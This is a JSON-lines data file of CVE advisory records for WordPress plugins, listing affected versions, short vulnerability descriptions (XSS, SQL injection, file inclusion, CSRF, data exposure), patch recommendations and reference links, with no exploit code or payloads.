{"CVE_ID":"CVE-2024-3725","slug":"otter-blocks","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post Grid widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes such as 'titleTag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb041f6-b88a-495a-8f5f-7f39f640748d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ceb041f6-b88a-495a-8f5f-7f39f640748d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071504\\\/otter-blocks\\\/trunk\\\/inc\\\/render\\\/class-posts-grid-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3071504\\\/otter-blocks\\\/trunk\\\/inc\\\/render\\\/class-posts-grid-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8899","slug":"jeg-elementor-kit","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.9 via the render_content function in class\/elements\/views\/class-tabs-view.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4efc9c47-321a-4635-943f-785ffc34d851?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4efc9c47-321a-4635-943f-785ffc34d851?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10308","slug":"jeg-elementor-kit","versionImpact":"2.6.9","versionEndExcluding":"2.6.10","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3193980\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4602","slug":"namaste-lms","versionImpact":"2.6.1.1","versionEndExcluding":"2.6.1.2","description":"The Namaste! LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'course_id'  parameter in versions up to, and including, 2.6.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d014f512-9030-49ce-945d-4900594fb373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d014f512-9030-49ce-945d-4900594fb373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1wliD7YvLqL2xWnR6jLEnWgoWRKsv9dCI\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1wliD7YvLqL2xWnR6jLEnWgoWRKsv9dCI\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966178\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966178\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36723","slug":"listingpro","versionEndExcluding":"2.6.1","description":"The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~\/listingpro-plugin\/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-listingpro-theme-fixed-a-critical-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-listingpro-theme-fixed-a-critical-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9b21f8e-8d66-4d3e-a383-bea20a3c4498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9b21f8e-8d66-4d3e-a383-bea20a3c4498?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/listingpro-multipurpose-directory-theme\\\/19386460\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/listingpro-multipurpose-directory-theme\\\/19386460\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6165","slug":"notifier","versionImpact":"2.6","versionEndExcluding":"2.6.1","description":"The WANotifier  WordPress plugin before 2.6.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e6648a-9d19-4e73-ad6c-f727802d8dd5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e6648a-9d19-4e73-ad6c-f727802d8dd5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0095","slug":"page-views-count","versionEndExcluding":"2.6.1","description":"The Page View Count WordPress plugin before 2.6.1 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009ca72e-e8fa-4fdc-ab2d-4210f8f4710f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/009ca72e-e8fa-4fdc-ab2d-4210f8f4710f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13453","slug":"pirate-forms","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The The Contact Form & SMTP Plugin for WordPress by PirateForms plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.6.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pirate-forms\\\/tags\\\/2.6.0\\\/gutenberg\\\/class-pirateforms-gutenberg.php#L145\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pirate-forms\\\/tags\\\/2.6.0\\\/gutenberg\\\/class-pirateforms-gutenberg.php#L145\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225666%40pirate-forms&old=3219203%40pirate-forms&sfp_email=&sfph_mail=#file163\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3225666%40pirate-forms&old=3219203%40pirate-forms&sfp_email=&sfph_mail=#file163\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98859214-7acf-4d40-9291-b5669b9614b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98859214-7acf-4d40-9291-b5669b9614b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8397","slug":"webtoffee-gdpr-cookie-consent","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The webtoffee-gdpr-cookie-consent WordPress plugin before 2.6.1 does not properly sanitize and escape the IP headers when logging them, allowing visitors to conduct Stored Cross-Site Scripting attacks. The payload gets triggered when an admin visits the 'Consent report' page and the malicious script is executed in the admin context.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/847fbf5d-f7cf-49fd-88bc-d7fa2a8110bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/847fbf5d-f7cf-49fd-88bc-d7fa2a8110bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8286","slug":"webtoffee-gdpr-cookie-consent","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The webtoffee-gdpr-cookie-consent WordPress plugin before 2.6.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting visit logs via CSRF attacks","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/628bbac0-76b1-4666-9c00-bae84b48f85c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/628bbac0-76b1-4666-9c00-bae84b48f85c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13593","slug":"bmlt-meeting-map","versionImpact":"2.6.0","versionEndExcluding":"2.6.1","description":"The BMLT Meeting Map plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.0 via the 'bmlt_meeting_map' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/trunk\\\/meeting_map.php#L510\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bmlt-meeting-map\\\/trunk\\\/meeting_map.php#L510\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226454%40bmlt-meeting-map&new=3226454%40bmlt-meeting-map&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226454%40bmlt-meeting-map&new=3226454%40bmlt-meeting-map&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22e5765-54bd-4677-947c-8a7c48bdf65b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c22e5765-54bd-4677-947c-8a7c48bdf65b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6506","slug":"wp-2fa","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The WP 2FA \u2013 Two-factor authentication for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.5.0 via the send_backup_codes_email due to missing validation on a user controlled key. This makes it possible for subscriber-level attackers to email arbitrary users on the site.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caff9be6-4161-47a0-ba47-6c8fc0c4ab40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/caff9be6-4161-47a0-ba47-6c8fc0c4ab40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11688","slug":"latex2html","versionImpact":"2.5.5","versionEndExcluding":"2.6.0","description":"The LaTeX2HTML plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ver' or 'date' parameter in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latex2html\\\/trunk\\\/inc\\\/html\\\/manual.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latex2html\\\/trunk\\\/inc\\\/html\\\/manual.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9af8b-1168-462d-a767-d16ee660f646?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9af8b-1168-462d-a767-d16ee660f646?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4750","slug":"buddyboss-platform","versionImpact":"2.5.91","versionEndExcluding":"2.6.0","description":"The buddyboss-platform WordPress plugin before 2.6.0 contains an IDOR vulnerability that allows a user to like a private post by manipulating the ID included in the request","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbe4034-842b-43b0-97d1-208811376dea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ffbe4034-842b-43b0-97d1-208811376dea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11273","slug":"pirate-forms","versionImpact":"2.5.2","versionEndExcluding":"2.6.0","description":"The Contact Form & SMTP Plugin for WordPress by PirateForms WordPress plugin before 2.6.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1049a83-1298-4c8c-aeac-0055110d38fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1049a83-1298-4c8c-aeac-0055110d38fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11272","slug":"pirate-forms","versionImpact":"2.5.2","versionEndExcluding":"2.6.0","description":"The Contact Form & SMTP Plugin for WordPress by PirateForms WordPress plugin before 2.6.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7a76794-bc7d-42d6-9e7d-d7b845a7f461\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d7a76794-bc7d-42d6-9e7d-d7b845a7f461\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12464","slug":"chatroll-live-chat","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The Chatroll Live Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'chatroll' shortcode in all versions up to, and including, 2.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatroll-live-chat\\\/tags\\\/2.5.0\\\/chatroll.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatroll-live-chat\\\/tags\\\/2.5.0\\\/chatroll.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87fdadcd-b776-471a-9756-708e384de4f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87fdadcd-b776-471a-9756-708e384de4f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6520","slug":"wp-2fa","versionImpact":"2.5.0","versionEndExcluding":"2.6.0","description":"The WP 2FA \u2013 Two-factor authentication for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.0. This is due to missing or incorrect nonce validation on the send_backup_codes_email function. This makes it possible for unauthenticated attackers to send emails with arbitrary content to registered users via a forged request granted they can trick a site administrator or other registered user into performing an action such as clicking on a link. While a nonce check is present, it is only executed if a nonce is set. By omitting a nonce from the request, the check can be bypassed.","recommendation":"Update to version 2.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0af451be-2477-453c-a230-7f3fb804398b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0af451be-2477-453c-a230-7f3fb804398b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-2fa\\\/trunk\\\/includes\\\/classes\\\/Admin\\\/class-setup-wizard.php?rev=2940688#L606\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3009922%40wp-2fa&new=3009922%40wp-2fa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12336","slug":"wc-affiliate","versionImpact":"2.5.3","versionEndExcluding":"2.6","description":"The WC Affiliate \u2013 A Complete WooCommerce Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'export_all_data' function in all versions up to, and including, 2.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose sensitive affiliate data, including personally identifiable information (PII).","recommendation":"Update to version 2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-affiliate\\\/trunk\\\/src\\\/AJAX.php#L903\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc-affiliate\\\/trunk\\\/src\\\/AJAX.php#L903\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0fb349-4cb8-4cf3-ae7c-5c4dcc6fd4f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0fb349-4cb8-4cf3-ae7c-5c4dcc6fd4f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0844","slug":"namaste-lms","versionEndExcluding":"2.6","description":"The Namaste! LMS WordPress plugin before 2.6 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d8e5852-3787-47f9-9931-8308bb81beb1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8d8e5852-3787-47f9-9931-8308bb81beb1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12255","slug":"accept-stripe-payments-using-contact-form-7","versionImpact":"2.5","versionEndExcluding":"2.6","description":"The Accept Stripe Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via the cf7sa-info.php file that returns phpinfo() data. This makes it possible for unauthenticated attackers to extract configuration information that can be leveraged in another attack.","recommendation":"Update to version 2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205295%40accept-stripe-payments-using-contact-form-7&new=3205295%40accept-stripe-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3205295%40accept-stripe-payments-using-contact-form-7&new=3205295%40accept-stripe-payments-using-contact-form-7&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a9e1325-1027-41ea-93be-c321aef61dea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a9e1325-1027-41ea-93be-c321aef61dea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0201","slug":"product-expiry-for-woocommerce","versionEndExcluding":"2.6","description":"The Product Expiry for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_settings' function in versions up to, and including, 2.5. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4006612-770a-482f-a8c2-e62f607914a9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4006612-770a-482f-a8c2-e62f607914a9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.5\\\/product-expiry-for-woocommerce.php#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.5\\\/product-expiry-for-woocommerce.php#L263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.6\\\/product-expiry-for-woocommerce.php?rev=3014924#L263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-expiry-for-woocommerce\\\/tags\\\/2.6\\\/product-expiry-for-woocommerce.php?rev=3014924#L263\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3601","slug":"simple-author-box","versionEndExcluding":"2.52","description":"The Simple Author Box WordPress plugin before 2.52 does not verify a user ID before outputting information about that user, leading to arbitrary user information disclosure to users with a role as low as Contributor.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0cc513e-c306-4920-9afb-e33d95a7292f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c0cc513e-c306-4920-9afb-e33d95a7292f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36698","slug":"security-malware-firewall","versionImpact":"2.50","versionEndExcluding":"2.51","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized user interaction in versions up to, and including, 2.50. This is due to missing capability checks on several AJAX actions and nonce disclosure in the source page of the administrative dashboard. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to call functions and delete and\/or upload files.","recommendation":"Update to version 2.51, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-fixed-in-security-malware-scan-by-cleantalk-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-vulnerabilities-fixed-in-security-malware-scan-by-cleantalk-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23960f42-dfc1-4951-9169-02d889283f01\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23960f42-dfc1-4951-9169-02d889283f01\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb9b039-eb04-4c27-89eb-1932c9c31962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fb9b039-eb04-4c27-89eb-1932c9c31962?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0548","slug":"namaste-lms","versionEndExcluding":"2.5.9.4","description":"The Namaste! LMS WordPress plugin before 2.5.9.4 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6c1ed7a-5b2d-4985-847d-56586b1aae9b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b6c1ed7a-5b2d-4985-847d-56586b1aae9b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13477","slug":"ltl-freight-quotes-unishippers-edition","versionImpact":"2.5.8","versionEndExcluding":"2.5.9","description":"The LTL Freight Quotes \u2013 Unishippers Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' parameter in all versions up to, and including, 2.5.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.5.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-unishippers-edition\\\/trunk\\\/shipping-rules\\\/shipping-rules-save.php#L84\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-unishippers-edition\\\/trunk\\\/shipping-rules\\\/shipping-rules-save.php#L84\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237773\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237773\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df452c9-4e73-40d7-88a3-d38ae1309d8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7df452c9-4e73-40d7-88a3-d38ae1309d8f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
